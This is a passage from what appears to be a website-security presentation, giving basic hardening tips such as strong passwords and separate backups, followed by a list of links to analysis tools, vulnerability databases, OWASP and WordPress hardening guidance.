• Use strong and unique passwords
• Ensure your own computer is secure
• Remove unused or old content from server
• Keep your clean backups totally separate

Page 29

Tools

• http://www.rexswain.com/httpview.html
• http://jsunpack.jeek.org/
• http://home.paulschou.net/tools/xlate/
• https://www.owasp.org/index.php/Main_Page
• http://nvd.nist.gov/
• http://osvdb.org/
• http://codex.wordpress.org/Hardening_WordPress

Page 30